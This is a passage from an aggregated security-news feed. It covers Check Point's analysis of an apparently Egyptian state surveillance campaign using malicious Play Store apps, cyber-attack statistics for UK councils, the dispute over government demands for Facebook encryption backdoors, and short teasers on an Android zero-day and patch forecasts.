Some of the apps used by the attackers were Secure Mail, a Gmail add-on to improve the security, iLoud200%, a smart storage solution that would free up storage space on the victim’s device, and the IndexY callerID service.

Using these apps the government cyber spies were able to gather login credentials to email accounts, bypass privacy settings, and store call logs.

These apps were available through the official Play Store and bypassed the security checks implemented by Google.

Experts provided details of the command and control infrastructure over the time. Attackers used a range of domain names that included words like “secure” and “verify” in their names to avoid raising suspicion of the victims.

“The full list of indicators belonging to this campaign and shared by Amnesty on GitHub showed multiple websites that used keywords such as “mail”, “secure”, or “verify”, possibly not to arouse any suspicions and to masquerade as legitimate mailing services.” reads the report published by Check Point.

“By visualizing the information available about each of these websites, we saw clear connections between them: they were registered using NameCheap, had HTTPS certificates, and many of them resolved to the same IP addresses.”

One of the domains analyzed by the researchers, maillogin[.]live, left a directory unsecured online, allowing the expert to analyze its content, a collection of files uploaded between May and June.

Egypt

“By downloading the contents of this directory, we got our hands on many PHP scripts, API clients, SQL files and configuration files from the server. Looking into them revealed several aspects about the inner workings of this operation, the functionalities that were implemented on this server and possibly others, and lastly some information about the perpetrators behind it all.” continues the analysis.

“For example, we realized that the attackers can control the operation by sending commands to one of the PHP scripts. The script allowed the attackers to query the data stored on the server, but it had self-destructing capabilities as well, such as removing an existing campaign or deleting all of the information collected from victims”

The researchers also discovered a Telegram channel that advertised itself as supporting the opponents of the regime in Egypt, but that is likely under the control of the intelligence services.

Check Point was not able to attribute the operation to the Egyptian intelligence, but the nature of the victims, the level of sophistication of the attacks and other evidence such as a server registered to the Ministry of Communications and Information Technology in Egypt.

“We discovered a list of victims that included handpicked political and social activists, high-profile journalists and members of non-profit organizations in Egypt.” concludes Check Point.

“The information we gathered from our investigation suggested that the perpetrators are Arabic speakers, and well familiar with the Egyptian ecosystem. Because the attack might be government-backed, it means that we are looking at what might be a surveillance operation of a country against its own citizens or of another government that screens some other attack using this noisy one.”

Pierluigi Paganini

(SecurityAffairs – Egypt, surveillance)

The post Egypt regularly spies on opponents and activists with mobile apps appeared first on Security Affairs.

UK Councils Faced 800 Cyber-Attacks Per Hour in 2019

UK Councils Faced 800 Cyber-Attacks Per Hour in 2019

The UK’s local authorities are facing an unprecedented barrage of cyber-threats, amounting to almost 800 every hour in the first half of 2019, according to insurance broker Gallagher.

Of the 203 councils that responded to the firm’s Freedom of Information (FOI) requests, nearly half (49%) had been targeted since the start of 2017, with over a third (37%) attacked in the first half of the year.

Over the first six months of 2019, those councils experienced 263 million attacks — a number that is likely to be much higher if those authorities which chose not to answer the FOI request were factored in.

However, despite the barrage, most authorities seem to be holding up: just 17 attacks were reported to have resulted in the loss of data or money, although one council reported the loss of over £2m, according to Gallagher.

Just 13% of local authorities have cyber insurance, a figure the firm would obviously like to see much higher.

“Councils are facing an unprecedented number of cyber-attacks on daily basis. While the majority of these are fended off, it only takes one to get through to cause a significant financial deficit, a cost which the taxpayer will ultimately foot,” argued Tim Devine, managing director of Public Sector & Education at Gallagher.

“Costs and reputational damage at this scale can be devastating for public authorities, many of which are already facing stretched budgets. In many scenarios, the people responsible for purchasing cyber-insurance products need decisions to be made at member, or management level. The cyber threat and the need for cover needs to be high on every local authority’s agenda.”

However, most of the attacks noted in the report are likely to be the result of “automated probing and discovery tools” and therefore should not be classed as true security incidents, according to Tripwire senior director, Paul Edon.

“However, the truth of the matter is that many local authorities and councils still remain unprepared for a true cyber-attack,” he added.

“To get security right, organizations need to get the basics right. Start by understanding the risk you have. You must conduct regular, preferably continuous, assessments of configuration and vulnerability risk across your IT systems. Then ensure systems are regularly patched and upgraded. Following these basic security hygiene rules will go a long way to making your systems secure and the attackers’ job more difficult.”

New 0-Day Flaw Affecting Most Android Phones Being Exploited in the Wild

Another day, another revelation of a critical unpatched zero-day vulnerability, this time in the world's most widely used mobile operating system, Android. What's more? The Android zero-day vulnerability has also been found to be exploited in the wild by the Israeli surveillance vendor NSO Group—infamous for selling zero-day exploits to governments—or one of its customers, to gain control of

Tripwire Patch Priority Index for September 2019

Tripwire’s September 2019 Patch Priority Index (PPI) brings together important vulnerabilities from Microsoft and Adobe. Exploit Framework Alert A Metasploit Exploit module that targets Windows Remote Desktop Services has been recently released. This exploit module targets CVE-2019-0708 for the so-called “BlueKeep” vulnerability. This vulnerability impacts Windows Server 2008, Windows 7, and Windows Server 2008 R2. […]… Read More

The post Tripwire Patch Priority Index for September 2019 appeared first on The State of Security.

Hashtag Trending – Uber launches job app; the office is dying; Netflix uses 15% of internet

Uber launches new job app; the physical office is dying; Netflix uses 15% of world’s internet Uber has revolutionized the transportation industry, and now they are looking to do the same for the job market, and it is trending on LinkedIn. Launching today in Chicago, Uber Works is geared towards the gig economy and they…

Experts Slam US, Australia and UK’s Facebook Encryption Demands

Experts Slam US, Australia and UK’s Facebook Encryption Demands

Security and privacy experts have heavily criticized an attempt by the UK, US and Australian governments to strong arm Facebook into halting its roll-out of end-to-end encryption.

Mark Zuckerberg announced a major overhaul of the social network in July following its $5bn fine from the FTC — a move which will include creating a privacy-by-design culture in the firm and extending end-to-end encryption beyond WhatsApp to Instagram and Messenger.

However, western governments are predictably dismayed at any efforts which will confound attempts by their intelligence agencies and the police to track suspects.

A widely reported open letter to Facebook from three-fifths of the Five Eyes nations demanded that the firm not continue with the encryption roll-out “without ensuring that there is no reduction to user safety and without including a means for lawful access to the content of communications to protect our citizens.”

That effectively means backdoor access for governments and law enforcers, something that the world’s leading cryptographers have repeatedly stated is not possible without undermining security for all.

Hannah Quay-de la Vallee, senior technologist at the non-profit Center for Democracy and Technology (CDT), repeated these arguments.

“Strong encryption and end-to-end security are bedrock technologies that keep information safe online. These technologies protect billions of communications every day, from the sensitive correspondence of victims of domestic violence to businesses’ financial records to our private medical information,” she explained.

“Creating a law that would mandate weaker and less secure technology is like mandating crumbling sidewalks to prevent criminals from escaping. It’s ridiculous, it won’t work, and it puts us all at far greater risk of serious injury.”

NSA whistleblower Edward Snowden also chipped in, warning that if Facebook caves to these government demands, “it may be the largest overnight violation of privacy in history.”

That doesn’t seem likely though, with a Facebook statement issued to confirm: “We strongly oppose government attempts to build backdoors because they would undermine the privacy and security of people everywhere.”

The open letter comes as the US and UK trumpeted a new “world first” data sharing agreement, that will allow law enforcers on both sides of the Atlantic to demand data from tech firms in the other country without needing to go through a lengthy liaison process with their respective governments.

October 2019 Patch Tuesday forecast: Be sure to apply service stack updates

School is back in session across most of the world, and here in the United States most students look forward to a school holiday called ‘fall break.’ While we never have a Patch Tuesday off, this may actually be a bit of fall break for most us because I don’t anticipate many updates this month. Before we get into the forecast details, I’d like to provide some information around service stack updates (SSUs) and how … More

The post October 2019 Patch Tuesday forecast: Be sure to apply service stack updates appeared first on Help Net Security.